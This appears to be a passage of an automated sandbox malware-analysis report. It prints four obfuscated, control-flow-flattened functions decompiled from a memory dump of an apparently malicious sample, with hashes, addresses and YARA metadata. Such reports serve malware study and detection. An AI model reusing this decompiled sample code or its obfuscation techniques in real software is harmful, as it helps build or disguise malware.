                                          • Instruction ID: 4bbe97ae95d15ce3e98052f33f1db1c3ec65c44e181b9eed4eb3722c8d0a1623
                                          • Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
                                          • Instruction Fuzzy Hash: 84F12372C003199BDF18CFA5C98AAEEBBB2FF04314F24815DE4167A2A0D7B45A46CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D1BDF, Relevance: 1.5, Strings: 1, Instructions: 283COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E006D1BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0x6dca2c; // 0x248300
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
				_v24 = 0xed7c;
				_v24 = _v24 + 0xffff8d1e;
				_v24 = _v24 + 0xffff0c72;
				_t355 = 0x48;
				_v24 = _v24 / _t355;
				_v24 = _v24 ^ 0x038e22ac;
				_v64 = 0x5fc5;
				_v64 = _v64 >> 4;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x000058c3;
				_v92 = 0x2688;
				_v92 = _v92 | 0xea27999c;
				_v92 = _v92 ^ 0xea278961;
				_v96 = 0x4a14;
				_t356 = 0x1f;
				_v96 = _v96 / _t356;
				_v96 = _v96 ^ 0x0000119a;
				_v36 = 0xd568;
				_v36 = _v36 ^ 0xbcd770ac;
				_v36 = _v36 << 6;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xe97134d4;
				_v68 = 0xedd2;
				_t357 = 0x63;
				_v68 = _v68 * 0x5e;
				_v68 = _v68 + 0xde9c;
				_v68 = _v68 ^ 0x00587d35;
				_v32 = 0x24d4;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2e569407;
				_v32 = _v32 << 0xf;
				_v32 = _v32 ^ 0x9e03fcb0;
				_v104 = 0x1c4d;
				_v104 = _v104 + 0xfffffff9;
				_v104 = _v104 ^ 0x00005633;
				_v40 = 0xb450;
				_v40 = _v40 + 0x94db;
				_v40 = _v40 | 0x3dcacfe3;
				_v40 = _v40 / _t357;
				_v40 = _v40 ^ 0x009f9709;
				_v100 = 0x6d07;
				_t358 = 0x45;
				_v100 = _v100 * 0x69;
				_v100 = _v100 ^ 0x002cf62e;
				_v72 = 0x5e87;
				_v72 = _v72 / _t358;
				_v72 = _v72 + 0xffff9f14;
				_v72 = _v72 ^ 0xffffe852;
				_v56 = 0x964f;
				_v56 = _v56 << 0xd;
				_v56 = _v56 + 0x58a7;
				_v56 = _v56 ^ 0x12ca7579;
				_v8 = 0x11e7;
				_t359 = 0x26;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 << 7;
				_v8 = _v8 / _t359;
				_v8 = _v8 ^ 0x001dbdc0;
				_v52 = 0x5afe;
				_t360 = 0x23;
				_v52 = _v52 * 0x24;
				_v52 = _v52 / _t360;
				_v52 = _v52 ^ 0x00001a55;
				_v88 = 0xb83d;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x00006413;
				_v20 = 0x5af3;
				_t361 = 0x3a;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 + 0x6d49;
				_v20 = _v20 ^ 0x8eb5ed48;
				_v20 = _v20 ^ 0x8e93dded;
				_v16 = 0x70c;
				_v16 = _v16 / _t361;
				_v16 = _v16 + 0xffff5089;
				_v16 = _v16 | 0x770f0b4d;
				_v16 = _v16 ^ 0xffff12de;
				_v60 = 0xa79c;
				_v60 = _v60 | 0xbac1c5ec;
				_v60 = _v60 + 0x6b12;
				_v60 = _v60 ^ 0xbac228f9;
				_v12 = 0x5546;
				_v12 = _v12 << 0xc;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 * 0x74;
				_v12 = _v12 ^ 0x001372eb;
				_v80 = 0x25db;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 3;
				_v80 = _v80 ^ 0x25db4552;
				_v44 = 0xe1b0;
				_v44 = _v44 + 0xffff2f0e;
				_v44 = _v44 | 0x46f5308b;
				_v44 = _v44 * 0x56;
				_v44 = _v44 ^ 0xd65e5bab;
				_v108 = 0x5856;
				_v108 = _v108 ^ 0x78cd5bef;
				_v108 = _v108 ^ 0x78cd26cd;
				_v76 = 0xfba5;
				_v76 = _v76 + 0xffff77ce;
				_t362 = 0x11;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x00005641;
				_t314 = 2;
				do {
					while(_t315 != 0x1de3f48) {
						if(_t315 == 0x1f19b69e) {
							_t363 = E006C78A5(_t315, _t315, 0x10, _t315, 4);
							E006C7787(_v96, 1, _v36,  &_v112, _v68, _v32, _t348);
							_t350 = _t348 + _t314;
							E006C7787(_v104, _t363, _v40,  &_v112, _v100, _v72, _t350);
							_t365 = _t365 + 0x40;
							_t351 = _t350 + _t363 * 2;
							_t315 = 0x344e60d4;
							_t303 = 0x5c;
							 *_t351 = _t303;
							_t348 = _t351 + _t314;
							continue;
						} else {
							if(_t315 == 0x344e60d4) {
								_t364 = E006C78A5(_t315, _t315, 0x10, _t315, 4);
								E006C7787(_v20, _t364, _v16,  &_v112, _v60, _v12, _t348);
								_t365 = _t365 + 0x28;
								_t352 = _t348 + _t364 * 2;
								_t315 = 0x1de3f48;
								_t311 = 0x2e;
								 *_t352 = _t311;
								_t348 = _t352 + _t314;
								continue;
							} else {
								if(_t315 == 0x3a31b660) {
									_t311 = E006D8C8F(_t315);
									_v112 = _t311;
									_t315 = 0x1f19b69e;
									continue;
								}
							}
						}
						goto L9;
					}
					E006C7787(_v80, 3, _v44,  &_v112, _v108, _v76, _t348);
					_t349 = _t348 + 6;
					_t365 = _t365 + 0x18;
					_t315 = 0x2228f3b5;
					 *_t349 = 0;
					_t348 = _t349 + _t314;
					L9:
				} while (_t315 != 0x2228f3b5);
				return _t311;
			}





















































                                          0x006d1be8
                                          0x006d1bf0
                                          0x006d1bf7
                                          0x006d1bfd
                                          0x006d1c04
                                          0x006d1c09
                                          0x006d1c10
                                          0x006d1c17
                                          0x006d1c23
                                          0x006d1c28
                                          0x006d1c2d
                                          0x006d1c34
                                          0x006d1c3e
                                          0x006d1c43
                                          0x006d1c48
                                          0x006d1c4f
                                          0x006d1c52
                                          0x006d1c59
                                          0x006d1c60
                                          0x006d1c67
                                          0x006d1c71
                                          0x006d1c76
                                          0x006d1c7b
                                          0x006d1c82
                                          0x006d1c89
                                          0x006d1c8d
                                          0x006d1c90
                                          0x006d1c97
                                          0x006d1c9e
                                          0x006d1ca5
                                          0x006d1cac
                                          0x006d1cb6
                                          0x006d1cbb
                                          0x006d1cc0
                                          0x006d1cc7
                                          0x006d1cce
                                          0x006d1cd5
                                          0x006d1cd9
                                          0x006d1cdd
                                          0x006d1ce4
                                          0x006d1cef
                                          0x006d1cf0
                                          0x006d1cf3
                                          0x006d1cfa
                                          0x006d1d01
                                          0x006d1d08
                                          0x006d1d0c
                                          0x006d1d13
                                          0x006d1d17
                                          0x006d1d1e
                                          0x006d1d25
                                          0x006d1d29
                                          0x006d1d30
                                          0x006d1d37
                                          0x006d1d3e
                                          0x006d1d4a
                                          0x006d1d4d
                                          0x006d1d54
                                          0x006d1d63
                                          0x006d1d66
                                          0x006d1d69
                                          0x006d1d70
                                          0x006d1d7e
                                          0x006d1d81
                                          0x006d1d88
                                          0x006d1d8f
                                          0x006d1d96
                                          0x006d1d9a
                                          0x006d1da1
                                          0x006d1da8
                                          0x006d1db3
                                          0x006d1db6
                                          0x006d1db9
                                          0x006d1dc4
                                          0x006d1dc7
                                          0x006d1dce
                                          0x006d1dd9
                                          0x006d1ddc
                                          0x006d1de6
                                          0x006d1de9
                                          0x006d1df0
                                          0x006d1df7
                                          0x006d1dfb
                                          0x006d1e02
                                          0x006d1e0d
                                          0x006d1e0e
                                          0x006d1e11
                                          0x006d1e18
                                          0x006d1e1f
                                          0x006d1e26
                                          0x006d1e32
                                          0x006d1e35
                                          0x006d1e3c
                                          0x006d1e43
                                          0x006d1e4a
                                          0x006d1e51
                                          0x006d1e58
                                          0x006d1e5f
                                          0x006d1e66
                                          0x006d1e6d
                                          0x006d1e71
                                          0x006d1e79
                                          0x006d1e7c
                                          0x006d1e83
                                          0x006d1e8a
                                          0x006d1e8e
                                          0x006d1e92
                                          0x006d1e99
                                          0x006d1ea0
                                          0x006d1ea7
                                          0x006d1eb2
                                          0x006d1eb5
                                          0x006d1ebc
                                          0x006d1ec3
                                          0x006d1eca
                                          0x006d1ed1
                                          0x006d1ed8
                                          0x006d1ee6
                                          0x006d1eeb
                                          0x006d1eee
                                          0x006d1ef5
                                          0x006d1ef6
                                          0x006d1ef6
                                          0x006d1f08
                                          0x006d1f99
                                          0x006d1fac
                                          0x006d1fb1
                                          0x006d1fc8
                                          0x006d1fcd
                                          0x006d1fd0
                                          0x006d1fd3
                                          0x006d1fda
                                          0x006d1fdb
                                          0x006d1fde
                                          0x00000000
                                          0x006d1f0a
                                          0x006d1f10
                                          0x006d1f4e
                                          0x006d1f61
                                          0x006d1f66
                                          0x006d1f69
                                          0x006d1f6c
                                          0x006d1f73
                                          0x006d1f74
                                          0x006d1f77
                                          0x00000000
                                          0x006d1f12
                                          0x006d1f18
                                          0x006d1f24
                                          0x006d1f29
                                          0x006d1f2c
                                          0x00000000
                                          0x006d1f2c
                                          0x006d1f18
                                          0x006d1f10
                                          0x00000000
                                          0x006d1f08
                                          0x006d1ffb
                                          0x006d2000
                                          0x006d2005
                                          0x006d2008
                                          0x006d200d
                                          0x006d2010
                                          0x006d2012
                                          0x006d2012
                                          0x006d2024

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 5}X
                                          • API String ID: 0-583016468
                                          • Opcode ID: bc044b1cac4d7c6f81e3d077147fa65b1a7dff02aa8b70cbe0c760ab3c3dc8ee
                                          • Instruction ID: e5e8eda3313d30fc8501b2ec0203910fa88463b472e743f750a2ef3c445cac48
                                          • Opcode Fuzzy Hash: bc044b1cac4d7c6f81e3d077147fa65b1a7dff02aa8b70cbe0c760ab3c3dc8ee
                                          • Instruction Fuzzy Hash: 0AD11471D0031DABDB18DFE5C88A9DEBBB1FB44314F20801AE512BA2A0D7B91A46CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C62A3, Relevance: 1.4, Strings: 1, Instructions: 178COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E006C62A3() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v608;
				char _v1128;
				void* _t179;
				void* _t180;
				intOrPtr _t182;
				void* _t190;
				intOrPtr _t206;
				void* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				void* _t214;

				_v88 = 0xf2dad;
				_t209 = 0;
				_t190 = 0x374ac1da;
				_v84 = _v84 & 0;
				_v40 = 0xb12b;
				_v40 = _v40 << 0xe;
				_v40 = _v40 >> 0xf;
				_v40 = _v40 ^ 0x000058bc;
				_v60 = 0xf727;
				_t210 = 0x4f;
				_v60 = _v60 / _t210;
				_v60 = _v60 ^ 0x00007065;
				_v8 = 0x9eec;
				_v8 = _v8 + 0xd770;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x00000fb6;
				_v44 = 0x7887;
				_v44 = _v44 << 5;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x00001109;
				_v16 = 0xef0c;
				_t211 = 0x7a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0xca26cbdc;
				_v16 = _v16 | 0x7bdc5f23;
				_v16 = _v16 ^ 0xfbfc55fd;
				_v76 = 0xd8b4;
				_v76 = _v76 + 0x9c32;
				_v76 = _v76 ^ 0x00017966;
				_v36 = 0x1b76;
				_v36 = _v36 + 0x8638;
				_v36 = _v36 | 0x465c0394;
				_v36 = _v36 ^ 0x465cdef1;
				_v28 = 0xf8c7;
				_v28 = _v28 ^ 0x90f840f6;
				_v28 = _v28 / _t211;
				_v28 = _v28 ^ 0x01300a73;
				_v80 = 0x4878;
				_v80 = _v80 ^ 0xf33f81bb;
				_v80 = _v80 ^ 0xf33fed7c;
				_v12 = 0x5e32;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xb939d170;
				_v12 = _v12 + 0xffffe46d;
				_v12 = _v12 ^ 0xb939c5f3;
				_v72 = 0xdcc7;
				_t212 = 5;
				_v72 = _v72 / _t212;
				_v72 = _v72 ^ 0x00000998;
				_v52 = 0xf409;
				_v52 = _v52 >> 7;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x00002b61;
				_v20 = 0x5cd8;
				_v20 = _v20 + 0x5908;
				_v20 = _v20 * 0x1c;
				_v20 = _v20 * 0x14;
				_v20 = _v20 ^ 0x018d9ab8;
				_v32 = 0x162d;
				_v32 = _v32 + 0xffff1b5c;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x1fff9926;
				_v64 = 0x95af;
				_v64 = _v64 + 0xffff7063;
				_v64 = _v64 ^ 0x00004670;
				_v56 = 0xeead;
				_v56 = _v56 + 0xffffd284;
				_v56 = _v56 ^ 0x94a6c65a;
				_v56 = _v56 ^ 0x94a662be;
				_v68 = 0xa18;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x0000400d;
				_v48 = 0xd4d3;
				_v48 = _v48 * 3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x0013dfa3;
				_v24 = 0x2d4a;
				_v24 = _v24 << 9;
				_v24 = _v24 + 0x17ff;
				_v24 = _v24 ^ 0x005aa30d;
				do {
					while(_t190 != 0x17ec002) {
						if(_t190 == 0x20702549) {
							_push(_v36);
							_t180 = E006D889D(0x6dc930, _v76, __eflags);
							_t182 =  *0x6dca2c; // 0x248300
							_t206 =  *0x6dca2c; // 0x248300
							E006C29E3(_t206, 0x104, _t180, _v28, _v80, _v12, _t182 + 0x230,  &_v1128, _v72, _v52);
							E006D2025(_v20, _t180, _v32, _v64);
							_t214 = _t214 + 0x30;
							_t190 = 0x17ec002;
							continue;
						} else {
							if(_t190 == 0x374ac1da) {
								_push(_t190);
								_push(_t190);
								E006CC6C7(_v60, _v8,  &_v608, _t190, _v44, _v40, _v16);
								_t214 = _t214 + 0x1c;
								_t190 = 0x20702549;
								continue;
							}
						}
						goto L7;
					}
					_push(_t190);
					_push(_v24);
					_push(0);
					_push(_v48);
					_push(0);
					_push(_v68);
					_push( &_v1128);
					_t179 = E006C568E(_v56, 0);
					_t214 = _t214 + 0x1c;
					__eflags = _t179;
					_t209 =  !=  ? 1 : _t209;
					_t190 = 0x3985ca2d;
					L7:
					__eflags = _t190 - 0x3985ca2d;
				} while (__eflags != 0);
				return _t209;
			}




































                                          0x006c62ac
                                          0x006c62b8
                                          0x006c62ba
                                          0x006c62bf
                                          0x006c62c2
                                          0x006c62c9
                                          0x006c62cd
                                          0x006c62d1
                                          0x006c62d8
                                          0x006c62e4
                                          0x006c62e9
                                          0x006c62ee
                                          0x006c62f5
                                          0x006c62fc
                                          0x006c6303
                                          0x006c6307
                                          0x006c630b
                                          0x006c6312
                                          0x006c6319
                                          0x006c631d
                                          0x006c6321
                                          0x006c6328
                                          0x006c6333
                                          0x006c6336
                                          0x006c6339
                                          0x006c6340
                                          0x006c6347
                                          0x006c634e
                                          0x006c6355
                                          0x006c635c
                                          0x006c6363
                                          0x006c636a
                                          0x006c6371
                                          0x006c6378
                                          0x006c637f
                                          0x006c6386
                                          0x006c6394
                                          0x006c6397
                                          0x006c639e
                                          0x006c63a5
                                          0x006c63ac
                                          0x006c63b3
                                          0x006c63ba
                                          0x006c63be
                                          0x006c63c5
                                          0x006c63cc
                                          0x006c63d3
                                          0x006c63dd
                                          0x006c63e0
                                          0x006c63e3
                                          0x006c63ea
                                          0x006c63f1
                                          0x006c63f5
                                          0x006c63f9
                                          0x006c6400
                                          0x006c6407
                                          0x006c6412
                                          0x006c6419
                                          0x006c641c
                                          0x006c6423
                                          0x006c642a
                                          0x006c6431
                                          0x006c6435
                                          0x006c643c
                                          0x006c6448
                                          0x006c644f
                                          0x006c6456
                                          0x006c645d
                                          0x006c6464
                                          0x006c646b
                                          0x006c6472
                                          0x006c6479
                                          0x006c647d
                                          0x006c6484
                                          0x006c648f
                                          0x006c6492
                                          0x006c6496
                                          0x006c649d
                                          0x006c64a4
                                          0x006c64a8
                                          0x006c64af
                                          0x006c64b6
                                          0x006c64b6
                                          0x006c64c4
                                          0x006c64f7
                                          0x006c6502
                                          0x006c651c
                                          0x006c6530
                                          0x006c653c
                                          0x006c654c
                                          0x006c6551
                                          0x006c6554
                                          0x00000000
                                          0x006c64c6
                                          0x006c64cc
                                          0x006c64d2
                                          0x006c64d3
                                          0x006c64eb
                                          0x006c64f0
                                          0x006c64f3
                                          0x00000000
                                          0x006c64f3
                                          0x006c64cc
                                          0x00000000
                                          0x006c64c4
                                          0x006c655e
                                          0x006c655f
                                          0x006c656a
                                          0x006c656c
                                          0x006c656f
                                          0x006c6571
                                          0x006c6577
                                          0x006c6578
                                          0x006c657f
                                          0x006c6583
                                          0x006c6585
                                          0x006c6588
                                          0x006c658d
                                          0x006c658d
                                          0x006c658d
                                          0x006c65a1

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: I%p
                                          • API String ID: 0-3985577374
                                          • Opcode ID: f54ab2a2636a8e96c8c58832449f3712c5c3663fedf756b3f649085e37ade23f
                                          • Instruction ID: 3828758527b8c2e7430392adfee543a78b0ffca5e654735eaa021980cd5e32cd
                                          • Opcode Fuzzy Hash: f54ab2a2636a8e96c8c58832449f3712c5c3663fedf756b3f649085e37ade23f
                                          • Instruction Fuzzy Hash: AD812871D0021DABDF58CFE5D94A9EEFBB1FB44318F108159E511B6260D7B50A05CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D0D33, Relevance: 1.4, Strings: 1, Instructions: 122COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006D0D33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _t128;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t173;
				signed int _t174;

				_push(_a12);
				_t173 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t128);
				_v8 = 0x6813;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0xf4e07894;
				_v8 = _v8 | 0x641e1778;
				_v8 = _v8 ^ 0xf4fe1535;
				_v16 = 0x7d9d;
				_t155 = 0x16;
				_v16 = _v16 * 0x4d;
				_v16 = _v16 ^ 0x0025b62f;
				_v32 = 0xbd8b;
				_v32 = _v32 ^ 0xdfb27dce;
				_v32 = _v32 / _t155;
				_v32 = _v32 ^ 0x0a2b09ce;
				_v28 = 0xad22;
				_t156 = 0x34;
				_v28 = _v28 * 0x47;
				_v28 = _v28 + 0x4161;
				_v28 = _v28 ^ 0x00307d44;
				_v36 = 0xa165;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x00006be3;
				_v12 = 0xca43;
				_v12 = _v12 << 7;
				_v12 = _v12 + 0x4480;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x00004998;
				_v44 = 0xc326;
				_v44 = _v44 / _t156;
				_v44 = _v44 ^ 0x000051cc;
				_v40 = 0xa768;
				_v40 = _v40 / _t156;
				_v40 = _v40 ^ 0x00002cdd;
				_v24 = 0x8f0;
				_v24 = _v24 << 2;
				_v24 = _v24 + 0xffff08f5;
				_v24 = _v24 | 0x28f06395;
				_v24 = _v24 ^ 0xffff76ac;
				_v20 = 0x26e;
				_v20 = _v20 + 0xffffc9ca;
				_v20 = _v20 + 0x3d88;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x00008c1f;
				_v48 = E006D8C8F(_t156);
				_v8 = 0xba8c;
				_v8 = _v8 + 0xffff546f;
				_v8 = _v8 | 0xb28855c5;
				_v8 = _v8 ^ 0xa47da239;
				_v8 = _v8 ^ 0x16f5fdc2;
				_v16 = 0x4025;
				_t157 = 0xb;
				_v16 = _v16 / _t157;
				_v16 = _v16 + 0xffffba03;
				_t158 = 0x3b;
				_v16 = _v16 / _t158;
				_v16 = _v16 ^ 0x0456c691;
				_t174 = E006C78A5(_t158, _t158, _v16, _t158, _v8);
				E006C7787(_v44, _t174, _v40,  &_v48, _v24, _v20, _t173);
				 *((short*)(_t173 + _t174 * 2)) = 0;
				return 0;
			}





















                                          0x006d0d3b
                                          0x006d0d3e
                                          0x006d0d40
                                          0x006d0d43
                                          0x006d0d47
                                          0x006d0d48
                                          0x006d0d4d
                                          0x006d0d57
                                          0x006d0d5d
                                          0x006d0d64
                                          0x006d0d6b
                                          0x006d0d72
                                          0x006d0d7f
                                          0x006d0d82
                                          0x006d0d85
                                          0x006d0d8c
                                          0x006d0d93
                                          0x006d0da1
                                          0x006d0da4
                                          0x006d0dab
                                          0x006d0db6
                                          0x006d0db7
                                          0x006d0dba
                                          0x006d0dc1
                                          0x006d0dc8
                                          0x006d0dcf
                                          0x006d0dd3
                                          0x006d0dda
                                          0x006d0de1
                                          0x006d0de5
                                          0x006d0dec
                                          0x006d0df0
                                          0x006d0df7
                                          0x006d0e05
                                          0x006d0e08
                                          0x006d0e0f
                                          0x006d0e1b
                                          0x006d0e1e
                                          0x006d0e25
                                          0x006d0e2c
                                          0x006d0e30
                                          0x006d0e37
                                          0x006d0e3e
                                          0x006d0e45
                                          0x006d0e4c
                                          0x006d0e53
                                          0x006d0e5e
                                          0x006d0e61
                                          0x006d0e73
                                          0x006d0e78
                                          0x006d0e7f
                                          0x006d0e86
                                          0x006d0e8d
                                          0x006d0e94
                                          0x006d0e9b
                                          0x006d0ea7
                                          0x006d0eaa
                                          0x006d0eaf
                                          0x006d0ebb
                                          0x006d0ebe
                                          0x006d0ec1
                                          0x006d0ee5
                                          0x006d0ef8
                                          0x006d0f02
                                          0x006d0f0b

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D}0
                                          • API String ID: 0-882559769
                                          • Opcode ID: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                          • Instruction ID: 72eaa12fba66a1ced6fe282a5366b19b0a2e272834111ccc6704cffb7baa0780
                                          • Opcode Fuzzy Hash: 0055a96e36ec0fc3778ffa7d8bdc67593becc071738deaf1b770c418e059c371
                                          • Instruction Fuzzy Hash: 2251F3B2D0120AEBDF09CFA5C94A8EEBBB2FB44314F108199E111B6290D7B95B55CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D340A, Relevance: 1.4, Strings: 1, Instructions: 118COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E006D340A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				void* _t88;
				void* _t94;
				void* _t100;
				void* _t102;
				intOrPtr _t117;
				signed int _t118;
				signed int* _t121;

				_t116 = _a8;
				_t100 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t88);
				_v88 = 0x94797;
				_t117 = 0;
				_v84 = 0xfccb1;
				_t121 =  &(( &_v124)[4]);
				_v80 = 0;
				_v120 = 0xe518;
				_t102 = 0x2e39b5d1;
				_v120 = _v120 >> 0xf;
				_v120 = _v120 | 0x8d2dde7f;
				_v120 = _v120 ^ 0x46a7e325;
				_v120 = _v120 ^ 0xcb8a2201;
				_v124 = 0x16d5;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 | 0x69fc1cf8;
				_t118 = 0x78;
				_v124 = _v124 * 0x21;
				_v124 = _v124 ^ 0xa97fd862;
				_v104 = 0xc3ad;
				_v104 = _v104 * 0x54;
				_v104 = _v104 ^ 0x00400d02;
				_v112 = 0x42c5;
				_v112 = _v112 ^ 0xf5e3cf1a;
				_v112 = _v112 ^ 0xb2e8281c;
				_v112 = _v112 | 0x1ecbfa7f;
				_v112 = _v112 ^ 0x5fcbcd35;
				_v96 = 0xbfa3;
				_v96 = _v96 ^ 0x0400a118;
				_v96 = _v96 ^ 0x04005591;
				_v116 = 0x719c;
				_v116 = _v116 / _t118;
				_v116 = _v116 << 3;
				_v116 = _v116 + 0xbb41;
				_v116 = _v116 ^ 0x0000fc42;
				_v100 = 0x8c7a;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0004412d;
				_v92 = 0xd0f9;
				_v92 = _v92 + 0xffffb579;
				_v92 = _v92 ^ 0x0000a3c3;
				_v108 = 0x6440;
				_v108 = _v108 ^ 0x55818320;
				_v108 = _v108 << 0xf;
				_v108 = _v108 + 0x2c19;
				_v108 = _v108 ^ 0xf3b003dd;
				do {
					while(_t102 != 0x4681a3b) {
						if(_t102 == 0xbf6d415) {
							__eflags = E006CB055(_v92, _v108, __eflags,  &_v76, _t116 + 4);
							_t117 =  !=  ? 1 : _t117;
						} else {
							if(_t102 == 0x17b92136) {
								E006D50F2( &_v76, _v120, _v124, _v104, _t100);
								_t121 =  &(_t121[3]);
								_t102 = 0x4681a3b;
								continue;
							} else {
								if(_t102 != 0x2e39b5d1) {
									goto L10;
								} else {
									_t102 = 0x17b92136;
									continue;
								}
							}
						}
						L13:
						return _t117;
					}
					_t94 = E006D8F11( &_v76, _v112, _v96, _t116, _v116, _v100);
					_t121 =  &(_t121[4]);
					__eflags = _t94;
					if(__eflags == 0) {
						_t102 = 0x114ebae0;
						goto L10;
					} else {
						_t102 = 0xbf6d415;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t102 - 0x114ebae0;
				} while (__eflags != 0);
				goto L13;
			}























                                          0x006d3411
                                          0x006d3418
                                          0x006d341a
                                          0x006d341b
                                          0x006d3422
                                          0x006d3423
                                          0x006d3424
                                          0x006d3429
                                          0x006d3431
                                          0x006d3433
                                          0x006d343b
                                          0x006d343e
                                          0x006d3444
                                          0x006d344c
                                          0x006d3451
                                          0x006d3456
                                          0x006d345e
                                          0x006d3466
                                          0x006d346e
                                          0x006d3476
                                          0x006d347b
                                          0x006d348a
                                          0x006d348b
                                          0x006d348f
                                          0x006d3497
                                          0x006d34a4
                                          0x006d34a8
                                          0x006d34b0
                                          0x006d34b8
                                          0x006d34c0
                                          0x006d34c8
                                          0x006d34d0
                                          0x006d34d8
                                          0x006d34e0
                                          0x006d34e8
                                          0x006d34f0
                                          0x006d3503
                                          0x006d3507
                                          0x006d350c
                                          0x006d3514
                                          0x006d351c
                                          0x006d3524
                                          0x006d3529
                                          0x006d3531
                                          0x006d3539
                                          0x006d3541
                                          0x006d3549
                                          0x006d3551
                                          0x006d3559
                                          0x006d355e
